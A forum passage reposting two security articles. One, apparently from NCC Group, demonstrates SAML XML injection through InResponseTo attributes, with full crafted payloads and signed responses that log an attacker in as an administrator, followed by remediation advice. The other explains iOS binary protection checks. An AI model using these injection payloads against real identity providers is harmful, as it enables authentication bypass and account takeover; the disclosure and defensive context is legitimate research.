AuthnInstant=&quot;2021-02-11T22:45:54.579Z&quot;&gt;&lt;saml:AuthnContext&gt;&lt;saml:AuthnContextClassRef&gt;urn:oasis:names:tc:SAML:2.0:ac:classes:Password&lt;/saml:AuthnContextClassRef&gt;&lt;/saml:AuthnContext&gt;&lt;/saml:AuthnStatement&gt;&lt;/saml:Assertion&gt;&lt;elem test=&quot;" Version="2.0" IssueInstant="2021-02-11T23:45:28Z" Destination="http://idp.adam.local:8080/SSOService" AssertionConsumerServiceURL="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"><saml:Issuer>http://sp.adam.local/</saml:Issuer><samlp:NameIDPolicy Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient" AllowCreate="true"/></samlp:AuthnRequest> When this was received by the identity provider, the following SAML response was produced. The injected XML has been highlighted in bold, although note that the XML was adjusted when the identity provider inserted the XML signature: <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_b804b8b3-1ced-4e16-9ef3-03b82338729b" Version="2.0" IssueInstant="2021-02-11T23:45:49.796Z" Destination="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/> <ds:Reference URI="#_b804b8b3-1ced-4e16-9ef3-03b82338729b"> <ds:Transforms> <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/> <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms> <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/> <ds:DigestValue>oE/7pnmcvbFYVsIPC4tao56UR/yAkpv3VL/VBXZXrXk=</ds:DigestValue> </ds:Reference> </ds:SignedInfo> <ds:SignatureValue>mA6oPZaOUMXxlFRQG5LzoVpmV4VB5K4iIQJ2sseqgYLXhrszbvJ85v7Qud6Fp8xKqC4nVIUZw73eHR2d4nakLKd0lPAqk7gTVC+1V1M3lpMkMCriqM5BNcR/lKpln3SnEzgUPAtbOgmsvKSmhME7fXIY9BUW0Kv/8FcCEdUGg70=</ds:SignatureValue> <ds:KeyInfo> <ds:X509Data> <ds:X509Certificate>MIICsDCCAhmgAwIBAgIUdbiKONoAtbg996PB63hRqTx/r3kwDQYJKoZIhvcNAQELBQAwajELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAkNBMRIwEAYDVQQHDAlTdW5ueXZhbGUxEjAQBgNVBAoMCU5DQyBHcm91cDESMBAGA1UECwwJU0FNTCBUZXN0MRIwEAYDVQQDDAlsb2NhbGhvc3QwHhcNMjEwMjA4MTgwNTM1WhcNMjIwMjA4MTgwNTM1WjBqMQswCQYDVQQGEwJVUzELMAkGA1UECAwCQ0ExEjAQBgNVBAcMCVN1bm55dmFsZTESMBAGA1UECgwJTkNDIEdyb3VwMRIwEAYDVQQLDAlTQU1MIFRlc3QxEjAQBgNVBAMMCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAzcBpN/M96rsY/eVadDGiWsxPtfh2gjx8MXbxitVeCn9/hxp5cMiNY3RLWP6G1unn/jmY5xgs2IOXnWnLCgOTztJ7xY7e55El3GUB2F+f92BsmymNbkmmjW3TS61R7DOmU5Z2c2kigxahhoV2CuZAP4qiJpWI77jK8MU2hnKyBaMCAwEAAaNTMFEwHQYDVR0OBBYEFG4sdyzqVsCQHO8YaigkbVmQE9RdMB8GA1UdIwQYMBaAFG4sdyzqVsCQHO8YaigkbVmQE9RdMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADgYEANF254aZkRGRTtjMLa7/8E6aFhtYCUU86YtRrrBFhslsooPMvwKnKelCdsE5Hp6V50WK2aTVBVI/biZGKCyUDRGZ0d5/dhsMl9SyN87CLwnSpkjcHC/b+I/nc3lrgoUSLPnjq8JUeCG2jkC54eWXMa6Ls2uFTEbUoI+BwJHFAH08=</ds:X509Certificate> </ds:X509Data> </ds:KeyInfo> </ds:Signature> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">admin@example.org</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46" NotOnOrAfter="2021-02-11T23:50:54.579Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/> </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-02-11T22:45:54.579Z" NotOnOrAfter="2021-02-11T23:50:54.579Z"> <saml:AudienceRestriction> <saml:Audience>http://sp.adam.local/</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-02-11T22:45:54.579Z"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion> <elem test=""/> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_68a25c00-2c08-458a-a760-40f5a55ada07" Version="2.0" IssueInstant="2021-02-11T23:45:49.796Z"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">user@example.org</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData NotOnOrAfter="2021-02-11T23:50:49.796Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46"/> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">admin@example.org</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData InResponseTo="_6c4ac3bd08f45c9f34a9230c39ef7e12ede0531e46" NotOnOrAfter="2021-02-11T23:50:54.579Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/> </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-02-11T22:45:54.579Z" NotOnOrAfter="2021-02-11T23:50:54.579Z"> <saml:AudienceRestriction> <saml:Audience>http://sp.adam.local/</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-02-11T22:45:54.579Z"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion> <elem test=""/> </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-02-11T23:45:49.796Z" NotOnOrAfter="2021-02-11T23:50:49.796Z"> <saml:AudienceRestriction> <saml:Audience>http://sp.adam.local/</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-02-11T23:45:49.796Z"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion> </samlp:Response> It should be noted that, due to the existence of two injection points, this SAML response contains three assertions; one injected using the XML injection payload, the second produced by the identity provider (with the legitimate user@example.org NameID), and another injected assertion embedded within the legitimate assertion (at the location of the second InResponseTo attribute). As described previously, the handling of such a SAML response will depend on the configuration of the service provider. During tests performed by NCC Group, the vulnerable identity provider was connected to a SimpleSAMLphp installation; this accepted the SAML response, and used the first occurrence of the assertion to authenticate the user, meaning that the attacker was logged in to the service under the context of admin@example.org. If the service provider uses the second assertion instead of the first, or if it rejects the response due to the repeated assertions, it may be possible to utilize XML comments again to effectively remove the identity provider’s assertion from the response. Two methods have been used successfully in tests performed by NCC Group. The first, if the XML parser used by the service provider is not too strict, simply leaves an unterminated comment at the end of the payload. The identity provider may ignore the lack of a closure for the comment, and generate a signature for the response using only the attacker’s assertion. An example of a payload which may achieve this has been provided below (decoded and formatted for readability): _29b9ae8ab8554e48c8c3a33a0bb270d5759c8a85c7"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">admin@example.org</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData InResponseTo="_29b9ae8ab8554e48c8c3a33a0bb270d5759c8a85c7" NotOnOrAfter="2021-02-12T06:51:42.705Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/> </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-02-11T22:45:54.579Z" NotOnOrAfter="2021-02-12T06:51:42.705Z"> <saml:AudienceRestriction> <saml:Audience>http://sp.adam.local/</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-02-11T22:45:54.579Z"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion> </saml:Response><!-- When the SAML response was generated by the identity provider, the content following the “<!–” string was ignored, effectively removing both the identity provider’s assertion, and the second assertion reflected at the second InResponseTo insertion point. Some identity providers will reject this payload, however, because the XML is invalid with an unterminated comment. To circumvent this restriction, the following alternative payload was developed (again, decoded and formatted for readability): _365db265e0bc16c34ffa06ad9b382bbff77541ee55" ncc-injection=' --> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">admin@example.org</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData InResponseTo="_365db265e0bc16c34ffa06ad9b382bbff77541ee55" NotOnOrAfter="2021-02-12T18:48:18.749Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/> <![CDATA['> <!-- ]]> <ncc-elem a=" This payload takes advantage of the fact that the content will be repeated twice within the SAML response produced by the identity provider. A combination of a comment and a CDATA block is used to enclose the identity provider’s assertion, and inject the new assertion. The payload can be broken down into the following components: First, a quote is used to escape from the first InResponseTo attribute, and a new attribute, ‘ncc-injection’, is created. This attribute uses single quotes for the value, so that the double quotes in the XML for the injected assertion can be preserved. The payload within the attribute value includes a closing comment string “–>”, followed by the malicious assertion XML. This is similar to previous payloads, but stops at the SubjectConfirmationData element, as this is where the second InResponseTo attribute occurs. Following the assertion XML, the attribute value includes the string used to open a CDATA block. Then, the single quote and angle bracket close the ncc-injection attribute and Response element. The “<!–” string is used to open a new comment; this comment will enclose the identity provider’s assertion. Then a “]]>” string is included. This will eventually close the CDATA block. Finally, a new element is included, “ncc-elem” with an attribute; this will balance the quote character left by the InResponseTo attribute created by the identity provider. (Note: again, this element may not be required, depending on the XML parser implementation). When processed by a vulnerable identity provider, the following XML was produced. Note that the first injected assertion, enclosed within the “samlp:Response” “ncc-injection” attribute, is not active. The comment encloses the first part of the identity provider’s assertion, which specifies the “user@example.org” username. Then, when the payload is repeated in the second InResponseTo attribute of the identity provider’s assertion, the “–>” string terminates the comment and the malicious XML becomes active. The malicious XML stops at the SubjectConfirmationData element, where the CDATA block begins; this CDATA block is designed to enclose the second “<!–” comment string, to prevent the remainder of the assertion/response XML from being commented. Finally, the “ncc-elem” element balances the quotes, and the remainder of the identity provider assertion template closes the XML, creating a valid SAML response: <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_65a7aa51-521c-46c2-8825-a0b51f730101" Version="2.0" IssueInstant="2021-02-12T05:55:46.978Z" Destination="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_365db265e0bc16c34ffa06ad9b382bbff77541ee55" ncc-injection=" -->&lt;saml:Issuer>http://idp.adam.local:8080&lt;/saml:Issuer>&lt;samlp:Status>&lt;samlp:StatusCode Value=&quot;urn:oasis:names:tc:SAML:2.0:status:Success&quot;/>&lt;/samlp:Status>&lt;saml:Assertion ID=&quot;_d0a71402-b0c1-453e-93bf-a3a43c50398b&quot; IssueInstant=&quot;2021-02-11T22:45:54.579Z&quot; Version=&quot;2.0&quot; xmlns:saml=&quot;urn:oasis:names:tc:SAML:2.0:assertion&quot; xmlns:xs=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot;>&lt;saml:Issuer>http://idp.adam.local:8080&lt;/saml:Issuer>&lt;saml:Subject>&lt;saml:NameID Format=&quot;urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress&quot;>admin@example.org&lt;/saml:NameID>&lt;saml:SubjectConfirmation Method=&quot;urn:oasis:names:tc:SAML:2.0:cm:bearer&quot;>&lt;saml:SubjectConfirmationData InResponseTo=&quot;_365db265e0bc16c34ffa06ad9b382bbff77541ee55&quot; NotOnOrAfter=&quot;2021-02-12T06:51:42.705Z&quot; Recipient=&quot;http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1&quot;/>-->&lt;![CDATA["><!-- ]]><ncc-elem a=""><saml:Issuer>http://idp.adam.local:8080</saml:Issuer><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status><saml:Assertion xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_f78b7401-f325-4083-b280-2c55b6ef02e1" Version="2.0" IssueInstant="2021-02-12T05:55:46.978Z"><saml:Issuer>http://idp.adam.local:8080</saml:Issuer><saml:Subject><saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">user@example.org</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2021-02-12T06:00:46.978Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_365db265e0bc16c34ffa06ad9b382bbff77541ee55" ncc-injection=' --> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/> <ds:Reference URI="#_65a7aa51-521c-46c2-8825-a0b51f730101"> <ds:Transforms> <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/> <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> </ds:Transforms> <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/> <ds:DigestValue>20FqC5eEhH0bv6lYVD6Dh1VczuZNg0NeemP0B32GFwc=</ds:DigestValue> </ds:Reference> </ds:SignedInfo> <ds:SignatureValue>O0XjQRmGusm2a2ImysF1wTB2HJSnCNE6aIxKd7cF8ZI+rEyHff4+mbW1uD81hwi4tvdwDjTZZNsnW8djLbAgT8E6dV2HsisXeDRBXvIobi1qW3KUf9k4oO70G0bhVjKWzCAHUo53SGNc6UDuvkijXoxEdyg5US13raeuXsjKs9w=</ds:SignatureValue> <ds:KeyInfo> <ds:X509Data> <ds:X509Certificate>MIICsDCCAhmgAwIBAgIUdbiKONoAtbg996PB63hRqTx/r3kwDQYJKoZIhvcNAQELBQAwajELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAkNBMRIwEAYDVQQHDAlTdW5ueXZhbGUxEjAQBgNVBAoMCU5DQyBHcm91cDESMBAGA1UECwwJU0FNTCBUZXN0MRIwEAYDVQQDDAlsb2NhbGhvc3QwHhcNMjEwMjA4MTgwNTM1WhcNMjIwMjA4MTgwNTM1WjBqMQswCQYDVQQGEwJVUzELMAkGA1UECAwCQ0ExEjAQBgNVBAcMCVN1bm55dmFsZTESMBAGA1UECgwJTkNDIEdyb3VwMRIwEAYDVQQLDAlTQU1MIFRlc3QxEjAQBgNVBAMMCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAzcBpN/M96rsY/eVadDGiWsxPtfh2gjx8MXbxitVeCn9/hxp5cMiNY3RLWP6G1unn/jmY5xgs2IOXnWnLCgOTztJ7xY7e55El3GUB2F+f92BsmymNbkmmjW3TS61R7DOmU5Z2c2kigxahhoV2CuZAP4qiJpWI77jK8MU2hnKyBaMCAwEAAaNTMFEwHQYDVR0OBBYEFG4sdyzqVsCQHO8YaigkbVmQE9RdMB8GA1UdIwQYMBaAFG4sdyzqVsCQHO8YaigkbVmQE9RdMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADgYEANF254aZkRGRTtjMLa7/8E6aFhtYCUU86YtRrrBFhslsooPMvwKnKelCdsE5Hp6V50WK2aTVBVI/biZGKCyUDRGZ0d5/dhsMl9SyN87CLwnSpkjcHC/b+I/nc3lrgoUSLPnjq8JUeCG2jkC54eWXMa6Ls2uFTEbUoI+BwJHFAH08=</ds:X509Certificate> </ds:X509Data> </ds:KeyInfo> </ds:Signature> <samlp:Status> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/> </samlp:Status> <saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Issuer>http://idp.adam.local:8080</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">admin@example.org</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData InResponseTo="_365db265e0bc16c34ffa06ad9b382bbff77541ee55" NotOnOrAfter="2021-02-12T06:51:42.705Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/>--><![CDATA['><!-- ]]> <ncc-elem a=""/> </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-02-12T05:55:46.978Z" NotOnOrAfter="2021-02-12T06:00:46.978Z"> <saml:AudienceRestriction> <saml:Audience>http://sp.adam.local/</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-02-12T05:55:46.978Z"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> </saml:Assertion> </samlp:Response> Depending on where the InResponseTo attributes are located within the XML document, it may be necessary to adjust the payload to ensure that the XML is correct and well-formed. There are some caveats to the InResponseTo attacks, however. This particular injection was only successful because the assertion in the SAML response was not signed. Some identity providers sign both the assertion and the SAML response. In this situation, it may only be possible to utilize the second InResponseTo injection point, as any modifications to this assertion after the application of the signature could cause the verification to fail. The specifics of this approach will vary based on the implementation of the identity provider, and the libraries used to parse and sign the XML. Recommendations Organizations and services that rely on SAML for authentication should examine identity providers and determine whether they are affected by XML injection vulnerabilities, particularly if the identity provider uses string-based templates to build SAML responses/assertions with user controlled data. Ideally, SAML responses and assertions should be constructed using an appropriate XML library that can safely set user-controlled data in attributes and text nodes. If it is absolutely necessary to use a string template, or string functions, to include user-controlled data within SAML messages, the data should be strictly validated. If XML characters are detected in the user-input, the authentication attempt should be rejected with an error message. Before insertion to the document, XML encoding should be applied to the data, to ensure that even if the validation is bypassed, the user input cannot inject additional XML. Additionally, consider enforcing the use of signatures for SAML authentication requests sent from service providers, where possible. If the SAML request signature is validated by the identity provider, any attempt to modify the request to include an XML injection payload (such as those which exploit the InResponseTo attribute) can be detected. Sursa: https://research.nccgroup.com/2021/03/29/saml-xml-injection/
      • 1
      • Upvote
  10. on ios binary protections Reading time ~10 min Posted by Leon Jacobs on 02 March 2021 Categories: Ios, Mobile, Objection, Binary I just got off a call with a client, and realised we need to think about how we report binary protections a bit more. More specifically the ios info binary command in objection. They can be a pain to explain if not well understood, and even harder to remediate! Binary protections make exploitation attempts much harder so, naturally we want all of them on. However, as you’d see in this article, not everything can always be enabled and sometimes it’s hard to understand why. ios binary protections information parsed by objection a quick primer Before diving into the protections themselves, let’s take a look at how objection parses each. The core of the parsing logic lives here, leveraging the nodejs macho package. Using macho, we can programatically parse any Mach-O format file for information about the binary. The macho package lets you specify a file to parse, and because we are already injected into a target process using Frida, we can access any file in the application bundle too. Reading the info() function in the agent you’d see we get the loaded modules using Frida API’s (Process.enumerateModules(), and then proceed to parse each file using the macho package. Once we have parsed a target binary or library, we proceed to ask some questions to determine if some binary protections are enabled. Let’s take a look at the PIE, ARC, and Canary flags. pie As you’d expect, a Mach-O file has a header. Part of the header structure is the flags field which is a bitmask of all the applicable flags for that binary. (refer to the Mach-O loader header source code here, specifically the MH_ prefixed flags, or the epic description here). The macho package we are using in objection simply parses that flags’ field which means we can ask it if exe.flags.pie is set. In other words, is 0x200000 set in the target binary? Pretty neat right! arc Unlike PIE, the check if Automatic Reference Counting (ARC) is set is not based on a flag in the header field. Instead, this check is something we infer based on imports that a binary has. There is a lot of information about ARC you can find in the LLVM documentation here, but basically its a memory safety mechanism that keeps tabs on objects and free’s them when no-one is using them anymore. This is not something that happens at load time like PIE, but instead happens at runtime. To detect if ARC is being used, we check if the function objc_release is imported by the target executable. We simply infer that ARC is used based on this; it does not prove that it does. This check could easily be fooled by anything that imports and does not actually use it, so keep that in mind. With the macho package we simply call imports.has("objc_release") for the check. canary Checking if stack canaries are in use is done in a similar fashion to ARC. When enabled, a stack canary is a random bit of data placed and checked before a function returns, aimed at making exploiting overflows harder. The use of the function __stack_chk_fail (and its derivatives) implies that should a stack canary be smashed, this function would be called as a safety bailout to prevent an exploitation attempt from returning to the wrong address (or similar). Just like ARC, if stack canaries weren’t enabled, but this function was imported for other reasons, the check could be fooled. To recap, it simply infers that stack canaries are enabled based on the fact that a function commonly used is imported, and not that its actually used. static analysis Using objection to check these protections is not the only way. Many scripts, plugins and other tools exist that do these checks. For example: https://github.com/slimm609/checksec.sh. Radare2 also has this capability, such as when using rabin2 or by using the ia command in the r2 disassembler. rabin2 used to enumerate macho flags and imports checking if stack canaries are enabled using r2 the naunces Now that you know how these binary protection mechanisms are enumerated, let’s talk about when you may have trouble interpreting the results like I did. In the iOS world today you are going to find applications written in Objective-C, Swift or both, and depending on the language used, different protections apply. Even “write once deploy anywhere” frameworks such as Cordova have native components. None of these protections are applicable to the extra layers that frameworks like Cordova (read: JavaScript) add on top of the native layer, so you can just ignore those. Certain protections are also only applicable to the main executable and none of the frameworks. Knowing which files need protections enabled is also important. Let’s take a quick look at a typical iOS application. The .ipa file can be unzipped to find a Payload/ directory, and in there a folder named usually ending in .app. Inside of this directory you’d typically find the main application executable (DVIA-v2 in the example below) and a Frameworks/ directory. The main executable as well as executables found in the Frameworks directory are all in scope for protections. executables highlighted with red arrows There may also be arbitrary .dylib files lying around (not necessarily in the Frameworks directory), so be sure to check them out too. identifying objc vs swift Some protections will only be applicable depending on the language the main executable or Framework is written in. In general, all of the protections should be enabled for Objective-C, but some are not (and seems like you can’t enable them anyways) for Swift. Knowing how to identify a pure Objective-C or Swift library is also important. In general you can spot this by looking at the executable’s symbol table. A pure Objective-C executable / library will have no swift references. no swift imports in the Realm executable swift references in the RealmSwift executable. Take special note of the _swift_FORCE_LOAD_ prefix. This is a pretty clear indicator that Swift is at the very least in use. An experienced eye will also be able to spot Swift mangled methods in the symbol table which won’t exist in a pure Objective-C binary. The only case that is hard to detect is a pure Swift binary. Even if written in pure Swift, theres always some references to Objective-C around. You can almost always see this when inspecting the linked libraries. libobjc linked in a Swift library built with Xcode Even when compiling a pure Swift file on macOS, libobjc shows it’s head! simple hello world swift program linking libobjc Out of interest I compiled the same program on Linux using the Swift tools for Linux, and there was no libobjc swift program compiled on linux not linked to libjobc Anyways, my point is that it’s really hard to be certain that an application is written in Pure swift, and you should be careful when considering how binary protections are enumerated for them. Let’s take a look at some of the exceptions to these protections. pie – exceptions PIE is only applicable to executables (Mach-O type MH_EXECUTE) and not libraries. A reference to this can be seen in a comment in the Mach-O loader source header here (formatted for readability). define MH_PIE 0x200000 /* When this bit is set, the OS will load the main executable at a random address. Only used in MH_EXECUTE filetypes. */ So, if the binary type is library, PIE being false is ok. arc – exceptions There are no exceptions to ARC. Both pure Objective-C, Swift and hybrid binaries should have this enabled. Note that objection versions < 1.10.0 incorrectly parsed the check for ARC, but that has since been fixed in version 1.10.1. For old Objective-C projects this should be enabled. For Swift projects it should automatically be enabled. canary – exceptions Stack canaries are an interesting one. For pure Objective-C binaries, this should always be enabled. Enabling it is done by passing the -fstack-protector-all flag to the C compiler. For pure Swift projects I could not find how to enable this. In fact, I reduced testing to a single, small hello world example to see if I could get it enabled but with no success. stack canaries not enabled for swift binaries I found this hard to believe, and thought maybe it would be different if I compiled it on Linux, but alas the same result. Some digging into this turned into me realising that “it’s complicated”. See: https://developer.apple.com/forums/thread/106300. The TL;DR is that it is in fact enabled, but conventional parsing is not enough to test that without recompiling the source. Given that Swiftlang is designed to be memory safe making memory corruption bugs much harder has me feeling comfortable that if a library is in fact pure Swift, and stack canaries weren’t enabled, the risk will be minimal. In summary, your decision making on which protections can and should be enabled is heavily influenced based on if Swiftlang is involved and whether the target binary is an executable or a library. enabling protections summary PIE – Add the -fPIC compiler flag to the projects build settings. This will only be applicable to the main executable. ARC – This will be automatically enabled for Swift only projects (via the swiftc compiler), and added by setting YES to the Objective-C Automatic Reference Counting section in the projects configuration. Canary – Enabled by adding the -fstack-protector-all compiler flag to Objective-C projects. If Swift is involved its possible to have it enabled when the library is a hybrid of Objective-C and Swift, but it could show as disabled which is okay. Special care should be taken to ensure that these configuration changes are applied to all frameworks in the project as well. Sursa: https://sensepost.com/blog/2021/on-ios-binary-protections/
